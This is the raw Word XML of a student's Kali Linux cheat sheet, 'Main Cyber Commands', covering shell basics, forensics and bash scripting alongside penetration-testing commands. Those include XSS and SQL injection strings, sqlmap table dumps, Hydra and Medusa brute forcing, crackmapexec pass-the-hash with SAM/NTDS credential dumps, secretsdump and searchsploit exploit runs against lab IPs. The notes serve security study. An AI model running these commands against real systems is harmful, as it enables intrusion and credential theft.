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B8DB" w14:textId="49EB5E89" w:rsidR="00D841C6" w:rsidRPr="00AD7813" w:rsidRDefault="00AD7813" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="cente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 xml:space="preserve">Main </w:t>
      </w:r>
      <w:r w:rsidR="003467DE" w:rsidRPr="00AD7813">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Cyber Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0084EF" w14:textId="1153F28D" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="00772D9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9517" w14:textId="7F463C75" w:rsidR="00A716BA" w:rsidRPr="00A716BA" w:rsidRDefault="00A716BA" w:rsidP="00A716B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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD70C" w14:textId="43CCB13C" w:rsidR="00613EAF" w:rsidRDefault="00786159" w:rsidP="0069419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 shows files and directories in my current location</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A0D7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 – shows directories and hidden files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-l – shows info on the dir and files like size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3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-R – show recursively all the directories from my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F316D" w14:textId="20612B9E" w:rsidR="003B35C9" w:rsidRDefault="00F954CE" w:rsidP="003B35C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 rockyou.txt – print all the passes of files that contain the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B35C9" w:rsidRP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find /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rockyou.txt file and shows the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21202C4F" w14:textId="61DCD294" w:rsidR="00772D97" w:rsidRDefault="00772D97"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 means super user do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE4388" w14:textId="752DD522" w:rsidR="00B31BEF" w:rsidRDefault="00B31BEF" w:rsidP="003467DE">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kali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user</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kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576E38F" w14:textId="5C12A380" w:rsidR="00E0359F" w:rsidRP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 – shows my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102059D" w14:textId="3503EDAF" w:rsidR="000A0D7F" w:rsidRDefault="000A0D7F" w:rsidP="0022779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to the first directory</w:t>
      </w:r>
      <w:r w:rsidR="00227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one directory back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32002FB3" w14:textId="0AFAC90C" w:rsidR="000A0D7F" w:rsidRDefault="00605A20"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nano asd.txt – edit a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079D1E" w14:textId="667621AC"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asd.txt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a file content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*.txt – enter all the text files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-n f27 – print the file content and sign each line with its number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B68005" w14:textId="2A436388" w:rsidR="00EC2FA6" w:rsidRDefault="00EC2FA6"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awk ‘{print $3}’ – print the third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$NF}’ – print the last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‘{print$(NF -1)}’ – print the second line from the end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$1, $2, $3}’ – print the first 3 lines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-F@ ‘{print $2}’ – separate all the lines where found @ and print the second column from all the columns.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‘length &gt; 7’ – prints all the lines that have more than 7 chars</w:t>
      </w:r>
      <w:r w:rsidR="008D40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‘NR == 111’ – print the line 111</w:t>
      </w:r>
      <w:r w:rsidR="00D729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‘$1 &gt; 60' – print only the lines where the first column bigger than 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6A24F" w14:textId="5FAD9DD4" w:rsidR="00074A8B" w:rsidRDefault="00074A8B" w:rsidP="00A71BB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-30 – prints the first 30 lines (the default is 10)</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 print the last 10 lines</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head -97 | tail -1 – print line number 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B98864" w14:textId="27FF0391" w:rsidR="00074A8B" w:rsidRDefault="00074A8B"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‘s/r/x/g’ – switch the char r in x in globally.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 sort the ouput so identical words and number will shows together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uniq – delete </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words, that’s why have to come after sort</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-c - delete adjacent words and count how many duplicates</w:t>
      </w:r>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-ic – delete adjacent words and count how many duplicates and ignore case sensitive</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-n – sort by number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3FCD3" w14:textId="47CE1263" w:rsidR="008D404F" w:rsidRDefault="008D404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wc -l – count number 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-m/c – count number of chars or bytes, which is the same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-w – counts the number of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785BE66" w14:textId="1BA5F68C" w:rsidR="00D37B8F" w:rsidRPr="00074A8B" w:rsidRDefault="00D37B8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‘a-z’ ‘A-Z’ – replacing all the chars a-z in A-Z</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tr ‘\t’ ‘\n’ – instead of tab go down a line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF428D"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prints the current date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8DECF"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 – prints the network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AF15F" w14:textId="07BF9F1C" w:rsidR="00806014" w:rsidRDefault="00806014"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 clear the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C64AD" w14:textId="0E58ECEA"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ddwd – creating a directoy called ddwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AC794" w14:textId="0B1843D8"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 prints the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CD889" w14:textId="1A1926A2" w:rsidR="00605A20" w:rsidRDefault="002F4F3E" w:rsidP="002F4F3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-f – remove a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rm -d – remove empty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-rd dddd – remove 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empty</w:t>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 ( r stands for recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7DDE8" w14:textId="77777777"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/home/kali/flag.txt /home/kali/Desktop – move the file from the first path to the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6BE00" w14:textId="6E53D848"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/home/kali/flag.txt /home/kali/Desktop – copy the file from the first path and paste in the other path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04E50F" w14:textId="526F745B" w:rsidR="009163B0" w:rsidRDefault="009163B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 – output the amount of time and users logged since the last boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B670C8" w14:textId="2D29ECB3" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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passwd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password for the user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5638866A" w14:textId="5D903E97" w:rsidR="005855F8" w:rsidRDefault="005855F8"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apt-get update – update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upgrade – upgrade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install cmatrix – install cmatrix package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACB66F" w14:textId="61DBC323" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="00A716B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 – change mode, change the permissions setting of a file.</w:t>
      </w:r>
      <w:r w:rsidR="00A716B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chmod +x file.sh – change the file permissions so we could run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AEF49" w14:textId="3A63E2A4" w:rsidR="00372529" w:rsidRDefault="00605A20" w:rsidP="00C11F4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"hello" – prints “hello”</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&gt;&gt; file.txt – add the text in the file, if the file </w:t>
      </w:r>
      <w:r w:rsidR="001A42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creates it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“hello” &gt; file.txt - put the text in the file, if the file exist, it override it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'hello\nhello'</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\033[1mexiting...\033[0m</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bold the text</w:t>
      </w:r>
      <w:r w:rsidR="00CA2A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\033[31mexiting...\033[0m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red text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4C2"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w:t>
      </w:r>
      <w:r w:rsidR="00A664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bold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red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the text formatting to the terminal's default settings</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CB85727" w14:textId="7EF6AC6B" w:rsidR="006C60E7" w:rsidRPr="00361DDD" w:rsidRDefault="006C60E7" w:rsidP="00361DD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“this is my project” – command to print</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text for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titles</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-f slant "Forensic investigation"</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headline in slant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295BD4F" w14:textId="32FA77E5" w:rsidR="00136837" w:rsidRPr="00372529" w:rsidRDefault="00136837"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90E4F" w14:textId="35A986D3" w:rsidR="00882BF3" w:rsidRDefault="00882BF3"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md5sum file.txt – calculate the md5 hash of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sha1sum file.txt – calculate the sha1 hash of the file</w:t>
      </w:r>
      <w:r w:rsidR="00DC7E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pehash rev.exe – calculate few hashes of PE files (exe, dll and more), the imphash, one of the hash results affected by the functionality of the file and not things as timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764EB51"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service ssh start/stop/status – for start stop or check the status of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A44AE2"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Wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008D369C">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downloads the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD9191" w14:textId="35F11E55" w:rsidR="00461CCA" w:rsidRDefault="00461CCA"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http://github.com....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03433891" w14:textId="07F1201E" w:rsidR="00406BD8" w:rsidRDefault="00502E69" w:rsidP="00406BD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 a command line tool that enables exchange between a device and a server through terminal.</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0284D" w14:textId="68FCD0E3" w:rsidR="009A2FE7" w:rsidRDefault="00502E69" w:rsidP="009A2F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“hello” – search for the word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“hello” - search for the word hello without care for case sensitive</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-v</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123456</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exclude </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word or number that contains 123456</w:t>
      </w:r>
      <w:r w:rsidR="003A5B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‘\S’ – delete empty lines</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 “hi” – search only for the word “hi” and not strings that contain “hi”</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-E ‘^[0-9]+$’</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sidRP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lines that contain numbers</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-R “hello” – search recursively in all the dir and files from the current path the word “hello”</w:t>
      </w:r>
      <w:r w:rsidR="00B106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-Eo '([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])'</w:t>
      </w:r>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only ip (maybe its not accurate)</w:t>
      </w:r>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‘password\|pass\|pwd’ *.txt – search for every word here in the files</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-B 8 – print 8 lines before the word</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-A 8 – print 8 lines after the word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBC071" w14:textId="3C17F68D" w:rsidR="00E52D0A" w:rsidRDefault="00E52D0A"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w:t>
      </w:r>
      <w:r w:rsidR="0005741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-tapn -</w:t>
      </w:r>
      <w:r w:rsidRPr="0062161E">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-planetu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both listening and non-listening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numerical addresses instead of resolving names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TCP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UDP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PID and name of the program to which each socket belongs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extended information, useful for extra details like user IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDDE38F" w14:textId="08312CC6" w:rsidR="00DB08F6" w:rsidRPr="00E52D0A" w:rsidRDefault="00DB08F6"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8F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lsof -i :8000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the process id (PID) of open port 8000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B08F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kill -9 5907</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close the port by killing the process (by PID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC5E6" w14:textId="25AE9E07" w:rsidR="002170DA" w:rsidRDefault="0034420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20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analyst.eml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specify the type of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261CEF45" w14:textId="35806355"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http.server 8000 – open port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D645A9C" w14:textId="3ADFF5FB" w:rsidR="00B150B7" w:rsidRDefault="00C44632"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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006028B0">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joe@10.10.10.10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using ssh to the machine 10.10.10.10 with joe user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA8D42" w14:textId="1EB1A542" w:rsidR="001D0E2C" w:rsidRDefault="001D0E2C"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‘kali’ ssh -o StrictHostKeyChecking=no</w:t>
      </w:r>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0104DD" w:rsidRPr="00622BB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kali@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>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 8.8.8.8” -sV -oG /home/kali/Desktop/nmap.txt – using the password kali (-p) with user kali, and run nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5ECC6" w14:textId="0E469831" w:rsidR="00B53A54" w:rsidRP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sshpass -p "$ssh_pass" scp /home/kali/Try.sh "$ssh_user"@"$ssh_ip":/home/"$ssh_user"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transfer a file from first machine to the second machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B838C" w14:textId="76AE6DFA" w:rsidR="00C44632" w:rsidRDefault="00C4463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 10.10.10.10 22 – connect port 22 (does not provide security)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nc -lvp 30 – listening, verbose, port, listen to port 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA7C86" w14:textId="36E6DAEC" w:rsidR="009D0E12" w:rsidRDefault="009D0E1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xsltproc all_nmap.xml &gt;&gt; nmap.html – convert xml to html (more readable)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 nmap.html</w:t>
      </w:r>
      <w:r w:rsidR="00800C8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html file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12609430" w14:textId="06A3ED78" w:rsidR="00980E0E" w:rsidRDefault="00E254BD" w:rsidP="00E254B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zip -r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"$first_location/$name_of_dir"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zip all the directories and files in the location provided and call the zip directory hello.zip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gunzip rockyou.txt.gz – open gz file</w:t>
      </w:r>
      <w:r w:rsidR="003D0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unzip filename – for open zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17692072" w14:textId="6A521865" w:rsidR="008D1514" w:rsidRDefault="008D151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-n “hello” | sha1sum – it will convert the word “hello” to hash in type of sha1sum, the -n is for explicit to not go down for another line, for the hash to be accurate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386DF13" w14:textId="006A64F2" w:rsidR="00647E23" w:rsidRDefault="00647E23"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erel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$name” – “hello erel”, variables in terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C413D" w14:textId="709FBF46" w:rsidR="00634FC1" w:rsidRDefault="00634FC1" w:rsidP="00634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char="${var,,}"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insert the sentence of var variable into char in lower case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773D222" w14:textId="75E6A8E8" w:rsidR="00C37C9A" w:rsidRDefault="00C37C9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echo “$file”; sleep 2; done – print the names of the files in the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FAC3F"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 harddisk.vmdk – shows us which files inside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binwalk -e harddisk.vmdk – extract files inside it can to, default directory name determined by the name of the file been carved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053913B"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foremost harddisk.vmdk -T output – carve another type of file from binwalk tool, if not specified the name of output, the default name of the directory is “output”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7271E7"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bulk_extractor</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E5" w:rsidRP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bulk – has to specify output directory, bulk tool extract a lot of files and sometimes even pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12781870" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="005A3156"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strings </w:t>
      </w:r>
      <w:r w:rsidRP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strings from the file, helpful with grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DB823" w14:textId="7E9AC4AD" w:rsidR="00B30837" w:rsidRDefault="00EA6EB0"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 file.elf – extract data on the file such original name and more, it may possible to change this data when loading the file to HxD and change there</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car5.jpg -comment = “car” – add new tag</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-csv photo.jpg &gt; extracted.csv – save the results to excel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CA80D" w14:textId="46331C31" w:rsidR="0043317B" w:rsidRDefault="0043317B"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 embed -ef a.txt -cf b.txt – cover the file a.txt behind b.txt, ef (embedded file), cf (cover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indo b.txt – show details on the file, maybe ask for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extract -sf b.txt – extract the hidden file behind b.txt, sf (secret file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650ADBCC" w14:textId="51E3B6C5" w:rsidR="00B02F1C" w:rsidRDefault="00B02F1C"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-jar loader.jar – a command to open the burpsuite (need to run from the burpsuite directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACEACB" w14:textId="6ABF1CED" w:rsidR="00A503FD" w:rsidRDefault="00A503FD"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&lt;script&gt;alert(‘xss attack’)&lt;/script&gt; - script you can insert into input box of a site to see if sql injection works on it</w:t>
      </w:r>
      <w:r w:rsidR="00B369D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for relational database</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D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&lt;SCRIPT&gt;alert(‘xss attack’)&lt;/SCRIPT&gt; - maybe they did not filtered big letters</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32B0" w:rsidRP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USERS WHERE username=1' OR '1'='1</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sql injection for extract all the users (works only if the table of the users called USERS, you can try also with USERNAME)</w:t>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ls – sql injection</w:t>
      </w:r>
      <w:r w:rsidR="004C174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also possible to encode special characters and use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77579631" w14:textId="7D1CA11D" w:rsidR="00810F6C" w:rsidRDefault="00810F6C"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Sqlmap – tool that destined to extract data from DB</w:t>
      </w:r>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sqlmap -r ddd.txt -D dvwa -T users –dump – extract users and passwords from users table from DB called dvwa by using the exist file ddd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB0030" w14:textId="603E97B7" w:rsidR="00C4394F" w:rsidRDefault="00C4394F" w:rsidP="005832B0">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Nikto -h 10.10.10.10 – tool for pt in web, could extract data by exploit misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77EF6E" w14:textId="4D8F90C0" w:rsidR="00425FB7" w:rsidRDefault="00425FB7"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Dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006B41E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http://10.10.10.10/multi</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files and directories in this location using brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA0377" w14:textId="4EF149AF" w:rsidR="0036430B" w:rsidRDefault="00FD363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Hydra -l kali -p 1234 10.10.10.10 ssh – attack the ssh service on ip 10.10.10.10 with kali user and password 1234, L or P is for list of users or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hydra -l malware -p 1 rdp://10.10.10.10 – attack the rdp port with malware user and password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for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007E488" w14:textId="730E94E4" w:rsidR="00697594" w:rsidRDefault="0069759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 -h 10.10.10.10 -u msfadmin -P /home/kali/file.txt -M ftp – use the user msfadmin with the password file to try brute force on ftp service on ip 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C04DF5" w14:textId="421232FD" w:rsidR="0036430B" w:rsidRDefault="0036430B"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Enum4linux 10.10.10.10 – tool that search info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217076" w14:textId="376A7EFD" w:rsidR="00601862" w:rsidRDefault="00E45354" w:rsidP="00E4535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3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 (Remote Procedure Call)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 -u “” -N 10.10.10.10  - try to connect to smb service with no username and no password, the flag -N means no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rpcclient -U “pentestme%Passw0rd\!” -c “queryuser Administrator” 10.10.10.10 – connect to ip 10.10.10.10 and run the command queryuser Administrator with the credentials pentestme as user and Passw0rd\! as password, (\ is for the special char ! to be recognized as part of the password), it retrieve info in administrator user.</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queryuser Administrator – it retrieve info in administrator user, could include user SID, and the groups </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member in</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enumdomgroups – find the amount of groups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enumdomusers – find the amount of users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6961B57"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8CF3"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1F580"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736D1" w14:textId="3BF24614" w:rsidR="00FA06B9" w:rsidRDefault="00412636" w:rsidP="00726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crackmapexec – used mainly for pt, it’s </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post exploitation tool</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use also for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63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enumerate information about network shares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run commands and more</w:t>
      </w:r>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main functions of him is PtH (pass the hash) and PtT (pass the ticket)</w:t>
      </w:r>
      <w:r w:rsidR="00726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crackmapexec smb 10.10.10.10 -u administrator -p 123456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credentials are right it will write “(pwn3d!)”</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123456 --sam – give us the sam file of users and passwords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-H ‘aasa…’  --shares – will use the has</w:t>
      </w:r>
      <w:r w:rsidR="000120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password for get data on share directories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123456 -x ‘mkdir malware’ – create directory called “malware”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B1E0D" w14:textId="6CE5F6ED" w:rsidR="00726FC1" w:rsidRDefault="00726FC1" w:rsidP="003C197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 – flag for pass the has instead of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‘mkdir malware’ – run command on the remote machine, in this example to create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 is used for extracting local account details from the SAM database on individual computers</w:t>
      </w:r>
      <w:r w:rsidR="008110C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--ntds</w:t>
      </w:r>
      <w:r w:rsid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extracting domain credentials from Active Directory domain controllers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--shares – extract info on share directories</w:t>
      </w:r>
      <w:r w:rsidR="003872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--users – get info on users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 get data on the groups and the amount of users every group has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startup – choose specific group, then we will get more data on the startup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0AAFCD" w14:textId="30ECCA5A" w:rsidR="00360534" w:rsidRDefault="00297646" w:rsidP="009C77E4">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Impacket-secretsdump -sam SAM.hive -secuirty SECURITY.hive -system SYSTEM.hive local – t</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command extracts hashed passwords and  other sensitive security information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uses the SYSTEM hive to decrypt the hashes found in the SAM hive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can also extract and decrypt LSA Secrets if they are accessible within the SECURITY hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B685FBE" w14:textId="050487CB" w:rsidR="00F833E7" w:rsidRDefault="00F833E7"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searchsploit vsftpd – search all the exist exploits of vsftpd service in the DB exploit</w:t>
      </w:r>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searchsploit -m 17491 – download the exploit file 17491 to our machine.</w:t>
      </w:r>
      <w:r w:rsidR="001418A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python 4957.py 10.10.10.10 – use the exploit 4957.py in the target 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BE0B8" w14:textId="4D635649" w:rsidR="00295DAD" w:rsidRDefault="00295DAD"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Sysmon.exe -i file.xml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Sysmon.exe -i accepteula – both commands are necessary for installing Sysmon (log in event viewer) and use the configuration found in xml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Sysmon.exe -c file.xml – for update the configuration (if you changed the xml file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBBF25" w14:textId="77777777" w:rsidR="00697594" w:rsidRDefault="00697594"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B8D3F"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527A"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949D8"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83BA5"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624835"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9236C"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E90F7"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EDC1F"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7A12"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58ABD"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88C16"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B33EA"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B0436"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ECDE9"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AB629" w14:textId="6EEB9082" w:rsidR="00601862" w:rsidRPr="000C387E" w:rsidRDefault="00601862" w:rsidP="00601862">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Volatality commands in windows/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76388DC3" w14:textId="224F99B6" w:rsidR="00601862" w:rsidRPr="00A80D19" w:rsidRDefault="00601862"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 this tool can be used in windows and linux, the difference is vol.exe or ./vol</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used volatality 2.5 and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Vol.exe -f memdump.mem imageinfo – get the OS (found in profile), we have to get that for the next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memdump.mem </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profile=winxpsp2 pstree</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processes in </w:t>
      </w:r>
      <w:r w:rsidR="00933DDE" w:rsidRP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pslist – print the procceses</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mftparser – shows all the mft table</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printkey -K “SAM\Domains\Account\Users\Names” – output all the users</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connscan – shows all the connection that’s has been on the computer</w:t>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connections – shows all the connections that wa active when the memory has been take</w:t>
      </w:r>
      <w:r w:rsidR="003907B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cmdline\dlllist -p 788 – shows the path of the process</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hivelist</w:t>
      </w:r>
      <w:r w:rsidR="005017A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a list of all the registries</w:t>
      </w:r>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dump2.mem –profile=vistasp1x86 hashdump – print the hashes of the users.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volatality 3 – a lil difference syntax</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windows.info – output profile, as imageinfo on vol 2.5</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windows.pslist – show  processes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windows.netscan.NetScan – shows connections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windows.envas – show computer name</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windows.filescan – show a lot of paths of files, and its offsets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windows.dumpfiles --virtaddr 0x808 – extract a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBFBA3C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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8907D"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31F6A" w14:textId="12FEF837" w:rsidR="0094127D" w:rsidRPr="000C387E" w:rsidRDefault="009A1A89" w:rsidP="0094127D">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w:t>
      </w:r>
      <w:r w:rsidR="0094127D"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127D">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9709963" w14:textId="588FFB65" w:rsidR="00670C38" w:rsidRPr="00670C38" w:rsidRDefault="00670C38" w:rsidP="00670C3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#!/bin/bash – the first line in bash scipt, called shebang</w:t>
      </w:r>
      <w:r w:rsidR="00586B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chmod +x file.sh – for we could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./file.sh –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bash file.sh – run the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468EBFB" w14:textId="7FD96049" w:rsidR="0052648E" w:rsidRDefault="00670C38"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a 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answer</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input </w:t>
      </w:r>
      <w:r w:rsidR="003C2A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-p “enter a name: ” name – shortcut of echo and read in the same line</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-s answer – get input without seeing on the screen</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-e “1. Asdasd\n2. asdawd” – for using special characters as \n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$answer” – using the variable, pay attention, </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w:t>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ip=$(cat erel.txt | awk ‘{print $NF}’) – insert a value to variable</w:t>
      </w:r>
      <w:r w:rsidR="001D0E2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is must not</w:t>
      </w:r>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location = $(pwd) – accumulate the current path</w:t>
      </w:r>
      <w:r w:rsidR="00F344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$number = $((number + count)) – syntax of sum of 2 numbers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA59AB" w14:textId="7EC0E767" w:rsidR="0052648E" w:rsidRDefault="0052648E" w:rsidP="00E3309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 WHOIS()</w:t>
      </w:r>
      <w:r w:rsidR="00E330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”hello”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4B238" w14:textId="43B0D5EF" w:rsidR="0052648E" w:rsidRDefault="0052648E"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WHOIS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for function, you have to remember to call the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0EEEE" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="0052648E" w:rsidP="00CF33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“$answer” == “y”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“ok, bye”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if, you have to put fi in the end, you have to write then line after if,</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compare strings in ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6A5B3" w14:textId="77777777" w:rsidR="00EE1783" w:rsidRDefault="00CF33F1" w:rsidP="00EE178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“$name” == “” ] – check if the variable is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED1DEF" w14:textId="052D92E6" w:rsidR="00CC2CFA" w:rsidRDefault="00CC2CFA"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grep -q '[^[:space:]]' "$first_location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file contains anything then space (to check if the file is empty of content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C7BA7" w14:textId="4572672E" w:rsidR="00987E1B" w:rsidRDefault="00987E1B"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-d “/home/kali/results” ] – check if the directory exist then, else …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248537FE" w14:textId="32F5853E" w:rsidR="00233685" w:rsidRDefault="00233685"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-f “$path” ] – get as input file path and check if exist then, else…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D05EA7" w14:textId="77777777" w:rsid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"$country" != "IL" ] &amp;&amp; [ "$country" != ""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country is not israel and use &amp;&amp; for two statemnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534DA8BF" w14:textId="51F90EDA" w:rsidR="0052648E" w:rsidRDefault="00987E1B"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"$check_if_anonymous" -eq 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to compare to number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303805E4" w14:textId="206C67F2" w:rsidR="0017417B" w:rsidRPr="00987E1B" w:rsidRDefault="0017417B" w:rsidP="0017417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1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"${var,,}" == "yes"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var variable converted to low characters before comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1B387" w14:textId="4219EE05" w:rsidR="00930780" w:rsidRDefault="00930780"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 $ip – using whois tool to search about this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geoiplookup $ip – using geoiplookup tool to search about this ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4AB7F" w14:textId="7D9AB174" w:rsidR="00892789" w:rsidRDefault="00892789"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“my project” – basic animation for beauty headline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE04B2" w14:textId="3CB1646B" w:rsidR="00FD41BF" w:rsidRDefault="00FD41BF"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 2 – wait 2 seconds before continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173CD5" w14:textId="2C0F6ECC" w:rsidR="00EB2E07" w:rsidRDefault="00EB2E07"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$number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nmap $ip -sV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nmap $ip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esac</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case, the $number is a number to insert one of the cases, *) is for every number that not one of the numbers like 1 or 2 in this case dunction, esac enclose the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5DED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E402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797C7" w14:textId="1DB60CB9" w:rsidR="004456B5" w:rsidRDefault="00D15AE0"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E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2DCC3" wp14:editId="5DB8EE59">
            <wp:extent cx="5274310" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="7149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331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1688465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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for using array, and installing packages, -s for check if the package exist,</w:t>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not, it install the package and sign -y automatically for the question if to install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D578C8" w14:textId="46065015" w:rsidR="00233685" w:rsidRDefault="00233685"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Y=0 – define a numerical variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806268D" w14:textId="006476DC" w:rsidR="00CC796D" w:rsidRDefault="00CC796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&gt;/dev/null 2&gt;&amp;1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all the output from the command, pay attention it will work only if you will put it in the right places, in the end of command before grep and more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2&gt;/dev/null – will not print error, could use to hide logo tools (as volatality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8F7EC" w14:textId="2B0DECA8"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Filename=$(basename “$path”) – get full path and extract the name of the file inside the variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED5B59" w14:textId="638BC069" w:rsidR="00730659" w:rsidRDefault="00D924E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6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name of file and extract the name of the extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E857" w14:textId="0A84234C" w:rsidR="00730659" w:rsidRDefault="00730659"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asd.txt – creates an empty file and override if already exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B6F58" w14:textId="48F9C586" w:rsidR="00596447" w:rsidRDefault="00596447"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start_seconds=$(date -d "$start_time" +%s)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time in epoch time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AED10" w14:textId="77777777" w:rsidR="00CE3331" w:rsidRDefault="00CE333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38434" w14:textId="3C9C22D5" w:rsidR="00D8498F" w:rsidRDefault="00CE3331" w:rsidP="00CE3331">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFont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31">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8498F" w:rsidRPr="00D8498F">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F1200B" wp14:editId="0F7A2B22">
